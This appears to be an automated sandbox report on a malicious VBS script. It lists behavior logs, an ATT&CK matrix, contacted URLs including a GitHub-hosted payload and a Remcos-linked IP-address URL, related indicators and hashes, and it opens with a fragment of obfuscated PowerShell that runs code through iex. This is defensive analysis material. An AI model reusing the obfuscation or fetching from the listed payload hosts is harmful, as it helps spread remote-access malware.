ubzdes'+'a'+'tiv'+'adoub'+'z, ubzr'+'egasm'+'ubz'+', ub'+'z'+'ub'+'z,u'+'bzu'+'b'+'z'+')')-creplace'mim',[char]39 -creplace ([char]97+[char]54+[char]56),[char]36 -creplace 'ubz',[char]34) | . ( $pshome[21]+$pshome[34]+'x')"Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information221
    Scripting
    Valid Accounts11
    Command and Scripting Interpreter
    221
    Scripting
    11
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    Security Software Discovery
    Remote Services1
    Archive Collected Data
    11
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    Exploitation for Client Execution
    1
    DLL Side-Loading
    1
    DLL Side-Loading
    21
    Virtualization/Sandbox Evasion
    LSASS Memory1
    Process Discovery
    Remote Desktop ProtocolData from Removable Media1
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts3
    PowerShell
    Logon Script (Windows)Logon Script (Windows)11
    Process Injection
    Security Account Manager21
    Virtualization/Sandbox Evasion
    SMB/Windows Admin SharesData from Network Shared Drive2
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Deobfuscate/Decode Files or Information
    NTDS1
    Application Window Discovery
    Distributed Component Object ModelInput Capture3
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
    Obfuscated Files or Information
    LSA Secrets1
    File and Directory Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    Software Packing
    Cached Domain Credentials12
    System Information Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    DLL Side-Loading
    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    iJEK0xwucj.vbs3%ReversingLabsWin32.Trojan.Generic
    iJEK0xwucj.vbs7%VirustotalBrowse
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    raw.githubusercontent.com0%VirustotalBrowse
    SourceDetectionScannerLabelLink
    http://nuget.org/NuGet.exe0%URL Reputationsafe
    http://nuget.org/NuGet.exe0%URL Reputationsafe
    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
    https://go.micro0%URL Reputationsafe
    https://contoso.com/0%URL Reputationsafe
    https://nuget.org/nuget.exe0%URL Reputationsafe
    https://contoso.com/License0%URL Reputationsafe
    https://contoso.com/Icon0%URL Reputationsafe
    https://oneget.orgX0%URL Reputationsafe
    https://aka.ms/pscore60%URL Reputationsafe
    https://aka.ms/pscore680%URL Reputationsafe
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
    https://oneget.org0%URL Reputationsafe
    https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt6%VirustotalBrowse
    http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
    https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtmiM;1%VirustotalBrowse
    http://www.apache.org/licenses/LICENSE-2.00%VirustotalBrowse
    https://raw.githubusercontent.com0%VirustotalBrowse
    http://172.232.184.131/801/SRVVR.txt2%VirustotalBrowse
    http://raw.githubusercontent.com0%VirustotalBrowse
    http://172.232.184.1311%VirustotalBrowse
    https://github.com/Pester/Pester1%VirustotalBrowse
    NameIPActiveMaliciousAntivirus DetectionReputation
    raw.githubusercontent.com
    185.199.108.133
    truefalseunknown
    NameMaliciousAntivirus DetectionReputation
    https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtfalseunknown
    http://172.232.184.131/801/SRVVR.txtfalseunknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1800253709.0000017830F66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1786311869.0000017822986000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    unknown
    http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000004.00000002.1786311869.000001782261C000.00000004.00000800.00020000.00000000.sdmpfalseunknown
    https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtmiM;powershell.exe, 00000004.00000002.1786311869.0000017821113000.00000004.00000800.00020000.00000000.sdmpfalseunknown
    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.1786311869.0000017821113000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1786311869.000001782261C000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    https://raw.githubusercontent.compowershell.exe, 00000004.00000002.1786311869.000001782254D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1786311869.0000017821113000.00000004.00000800.00020000.00000000.sdmpfalseunknown
    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.1786311869.0000017821113000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1786311869.000001782261C000.00000004.00000800.00020000.00000000.sdmpfalseunknown
    https://go.micropowershell.exe, 00000004.00000002.1786311869.00000178220F4000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    https://contoso.com/powershell.exe, 00000004.00000002.1786311869.0000017822986000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1800253709.0000017830F66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1786311869.0000017822986000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    https://contoso.com/Licensepowershell.exe, 00000004.00000002.1786311869.0000017822986000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    http://raw.githubusercontent.compowershell.exe, 00000004.00000002.1786311869.00000178225D3000.00000004.00000800.00020000.00000000.sdmpfalseunknown
    https://contoso.com/Iconpowershell.exe, 00000004.00000002.1786311869.0000017822986000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    https://oneget.orgXpowershell.exe, 00000004.00000002.1786311869.000001782261C000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    https://raw.githubusercontpowershell.exe, 00000004.00000002.1786311869.00000178225CD000.00000004.00000800.00020000.00000000.sdmpfalse
      unknown
      https://aka.ms/pscore6powershell.exe, 00000002.00000002.1827379390.000002C680050000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      https://aka.ms/pscore68powershell.exe, 00000002.00000002.1827379390.000002C680070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1786311869.0000017820EF1000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1827379390.000002C68009D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1786311869.0000017820EF1000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://172.232.184.131(powershell.exe, 00000004.00000002.1786311869.000001782140B000.00000004.00000800.00020000.00000000.sdmpfalse
        unknown
        https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1786311869.0000017821113000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1786311869.000001782261C000.00000004.00000800.00020000.00000000.sdmpfalseunknown
        https://oneget.orgpowershell.exe, 00000004.00000002.1786311869.000001782261C000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://172.232.184.131powershell.exe, 00000004.00000002.1786311869.000001782131B000.00000004.00000800.00020000.00000000.sdmpfalseunknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        172.232.184.131
        unknownUnited States
        20940AKAMAI-ASN1EUfalse
        185.199.108.133
        raw.githubusercontent.comNetherlands
        54113FASTLYUSfalse
        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1523819
        Start date and time:2024-10-02 05:21:05 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 5m 40s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:11
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:iJEK0xwucj.vbs
        renamed because original name is a hash value
        Original Sample Name:100d33a5d9d11b85a4b1f821a5dce334df5673da75d57ec4061df68d1c1a1a9f.vbs
        Detection:MAL
        Classification:mal100.expl.evad.winVBS@6/6@1/2
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 11
        • Number of non-executed functions: 1
        Cookbook Comments:
        • Found application associated with file extension: .vbs
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
        • Execution Graph export aborted for target powershell.exe, PID 7596 because it is empty
        • Execution Graph export aborted for target powershell.exe, PID 7728 because it is empty
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtProtectVirtualMemory calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
        TimeTypeDescription
        23:22:05API Interceptor2594x Sleep call for process: powershell.exe modified
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        172.232.184.131SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtfGet hashmaliciousRemcosBrowse
        • 172.232.184.131/801/SRVVR.txt
        dvswiftsend_240917122612_9331095243.docx.docGet hashmaliciousRemcosBrowse
        • 172.232.184.131/801/SRVVR.txt
        185.199.108.133mitec_purchase_order_PDF (1).vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
          http://detection.fyiGet hashmaliciousNetSupport RAT, Lsass Dumper, Mimikatz, Nukesped, Quasar, Trickbot, XmrigBrowse
            asegura.vbsGet hashmaliciousRemcosBrowse
              tCNVKM4mkt.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                SecuriteInfo.com.Exploit.CVE-2017-11882.123.28227.30541.rtfGet hashmaliciousRemcosBrowse
                  https://krakenqplogin.gitbook.io/us/Get hashmaliciousHTMLPhisherBrowse
                    https://trezor-docs-info.github.io/Get hashmaliciousHTMLPhisherBrowse
                      http://bafybeifqgf7hacp4ugl6xk57ans3phuwnlp3z3gnzdxkrgb5rfaoestwfy.ipfs.dweb.link/Get hashmaliciousUnknownBrowse
                        http://gasbot-demos.vercel.app/Get hashmaliciousUnknownBrowse
                          http://openseanftclaim-bay.vercel.app/Get hashmaliciousUnknownBrowse
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            raw.githubusercontent.commitec_purchase_order_PDF (1).vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                            • 185.199.108.133
                            00#U2800.exeGet hashmaliciousUnknownBrowse
                            • 185.199.110.133
                            asegurar.vbsGet hashmaliciousRemcosBrowse
                            • 185.199.110.133
                            dcsegura.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                            • 185.199.110.133
                            asegura.vbsGet hashmaliciousRemcosBrowse
                            • 185.199.108.133
                            R183nzNa89.exeGet hashmaliciousUnknownBrowse
                            • 185.199.110.133
                            hHNfR2jxEo.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                            • 185.199.109.133
                            tCNVKM4mkt.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                            • 185.199.108.133
                            R183nzNa89.exeGet hashmaliciousUnknownBrowse
                            • 185.199.111.133
                            Shipping Documents.xlsGet hashmaliciousRemcosBrowse
                            • 185.199.111.133
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            AKAMAI-ASN1EUhttps://www.evernote.com/shard/s683/sh/202c4f3c-3650-93fd-8370-eaca4fc7cbbc/9PDECUYIIdOn7uDMCJfJSDfeqawh-oxMdulb3egg-jZJLZIoB686GWk5jgGet hashmaliciousHTMLPhisherBrowse
                            • 95.101.148.20
                            file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                            • 23.197.127.21
                            https://app.glorify.com/file/1193241?format=90Get hashmaliciousHTMLPhisherBrowse
                            • 172.233.121.253
                            https://sharing.clickup.com/9011385758/t/h/868a15nvk/VTTN7SYFPHZE3ITGet hashmaliciousHTMLPhisherBrowse
                            • 172.233.46.10
                            vFjfAgq5PM.msiGet hashmaliciousAmadeyBrowse
                            • 2.16.62.200
                            https://wetransfer.com/downloads/fc718a7028ccd1e273879a61c0883fe420241001145250/8110e2eb5f5a56cc2015d1b3243d9b3120241001145309/33d289?trk=TRN_TDL_01&utm_campaign=TRN_TDL_01&utm_medium=email&utm_source=sendgridGet hashmaliciousHTMLPhisherBrowse
                            • 2.16.238.25
                            m6Y6Kh9Bwy.dllGet hashmaliciousUnknownBrowse
                            • 172.234.250.134
                            i3VUv6lXnE.exeGet hashmaliciousUnknownBrowse
                            • 172.234.250.134
                            N37e46ORr5.exeGet hashmaliciousMetasploit, MeterpreterBrowse
                            • 172.234.120.150
                            http://www.aieov.com/setup.exeGet hashmaliciousUnknownBrowse
                            • 2.22.61.59
                            FASTLYUSmitec_purchase_order_PDF (1).vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                            • 185.199.108.133
                            https://unpaidrefund.top/view/mygovGet hashmaliciousHTMLPhisherBrowse
                            • 151.101.194.137
                            https://sanbernardinoscounty.telcom-info.com/Get hashmaliciousHtmlDropperBrowse
                            • 151.101.2.137
                            http://t1.global.clubavolta.com/r/?id=h53ebcb4b,29506a5f,2988ba3e&e=cDE9UkVEX0dMX0xveWFsdHlMYXVuY2hTb2x1cy1OT0NPTS1BTEwtMDExMDIwMjQtMV9YWCZwMj1kNzEwNWE1Zi00NjE3LWVmMTEtOWY4OS0wMDBkM2EyMmNlYTE&s=MLotNdk8aEH7W1636YhgxIdQC5od3UWYqTZw3tm9630Get hashmaliciousUnknownBrowse
                            • 151.101.194.137
                            http://detection.fyiGet hashmaliciousNetSupport RAT, Lsass Dumper, Mimikatz, Nukesped, Quasar, Trickbot, XmrigBrowse
                            • 185.199.110.154
                            00#U2800.exeGet hashmaliciousUnknownBrowse
                            • 185.199.110.133
                            https://www.evernote.com/shard/s683/sh/202c4f3c-3650-93fd-8370-eaca4fc7cbbc/9PDECUYIIdOn7uDMCJfJSDfeqawh-oxMdulb3egg-jZJLZIoB686GWk5jgGet hashmaliciousHTMLPhisherBrowse
                            • 151.101.66.137
                            https://dvs.ntoinetted.com/kJthYXSER3TmsdtC7bAT5eXqQ/#geir@byggernfauske.noGet hashmaliciousHTMLPhisherBrowse
                            • 151.101.194.137
                            http://klasstackle.com/lfL15Q57vu4UGet hashmaliciousHTMLPhisherBrowse
                            • 151.101.194.137
                            https://trello.com/c/2T5XVROVGet hashmaliciousHTMLPhisherBrowse
                            • 151.101.129.140
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            3b5074b1b5d032e5620f69f9f700ff0ePofaABvatI.vbsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                            • 185.199.108.133
                            file.exeGet hashmaliciousCredential FlusherBrowse
                            • 185.199.108.133
                            mitec_purchase_order_PDF (1).vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                            • 185.199.108.133
                            DHL Shipping documents 0020398484995500.exeGet hashmaliciousAgentTeslaBrowse
                            • 185.199.108.133
                            http://tvsurf.jp/Get hashmaliciousUnknownBrowse
                            • 185.199.108.133
                            https://files.constantcontact.com/2d77228b901/702368a5-3f96-4cb6-b61d-aab8728be1ff.pdfGet hashmaliciousUnknownBrowse
                            • 185.199.108.133
                            https://sanbernardinoscounty.telcom-info.com/Get hashmaliciousHtmlDropperBrowse
                            • 185.199.108.133
                            OXrZ6fj4Hq.exeGet hashmaliciousNeshta, Oski Stealer, StormKitty, SugarDump, Vidar, XWormBrowse
                            • 185.199.108.133
                            Pedido09669281099195.com.exeGet hashmaliciousDarkTortilla, QuasarBrowse
                            • 185.199.108.133
                            https://finalstepgetshere.com/uploads/beta9.zipGet hashmaliciousLummaCBrowse
                            • 185.199.108.133
                            No context
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):9434
                            Entropy (8bit):4.928515784730612
                            Encrypted:false
                            SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                            MD5:D3594118838EF8580975DDA877E44DEB
                            SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                            SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                            SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):64
                            Entropy (8bit):1.1940658735648508
                            Encrypted:false
                            SSDEEP:3:Nllluld4Jt/Z:NllU6j
                            MD5:745E05B9A9795FA48B7E42C8C025B9FA
                            SHA1:A3C346B741ACC27369A4AF25CAEB45BC874F0F58
                            SHA-256:B6AF71FFBBE45D8F8F3503C329FBA2EE8EF16307C16979260662355E014E4501
                            SHA-512:9783934689D83CD7A99F306A149B2240B7200C1E1A9B951A51EBC12909A68786189A3412FA62BBB27B7E0F3B013FD4D111C5CB9E1791C0BAF8779B95C6280F62
                            Malicious:false
                            Reputation:low
                            Preview:@...e.................................L..............@..........
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Entropy (8bit):3.7474965030799905
                            TrID:
                            • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                            • MP3 audio (1001/1) 32.22%
                            • Lumena CEL bitmap (63/63) 2.03%
                            • Corel Photo Paint (41/41) 1.32%
                            File name:iJEK0xwucj.vbs
                            File size:288'920 bytes
                            MD5:e459f24a8ebcab954d106124ef15a5c6
                            SHA1:518535d2e17324e622cd70b233bf83fdd1ddf10e
                            SHA256:100d33a5d9d11b85a4b1f821a5dce334df5673da75d57ec4061df68d1c1a1a9f
                            SHA512:9105658c0ff3a430ce46f290f6af9bb54ad577c30d5283ce93a55752d0020f8df86909109e1ec9e2299389dc1c12b27389f06fc489de9a17b12eae74e2510272
                            SSDEEP:6144:kHNhe+0z7yKNZ4ng4xdI2CVodYmZYbqhdVIgGAT:kHDBcyQZ4ng4xdI2HdYmZYbqyyT
                            TLSH:E554F41135EA7008F1F32F6356F955E94FABB9652A3A811E644C1B0E1BE3E80CE517B3
                            File Content Preview:..o.B.G.N.K.v.P.c.W.k.c.z.x.t.a.s.O.o.a.i.N.i.o.L.A.W.f.L.W.k.n. .=. .".m.K.I.W.h.L.l.L.i.K.B.G.W.B.i.A.L.t.N.W.B.J.q.i.W.q.t.L.U.c.B.".....k.p.P.k.p.G.f.j.j.L.l.t.u.W.g.K.G.L.G.N.i.G.U.P.W.c.i.c.f.W.T. .=. .".N.N.o.u.T.t.q.L.L.K.c.G.x.Z.j.u.z.W.W.b.u.R.B
                            Icon Hash:68d69b8f86ab9a86
                            TimestampSource PortDest PortSource IPDest IP
                            Oct 2, 2024 05:22:06.588043928 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:06.588090897 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:06.588185072 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:06.597521067 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:06.597536087 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:07.078840971 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:07.078950882 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:07.093777895 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:07.093794107 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:07.094155073 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:07.105484962 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:07.151401997 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:07.325598001 CEST44349699185.199.108.133192.168.2.7
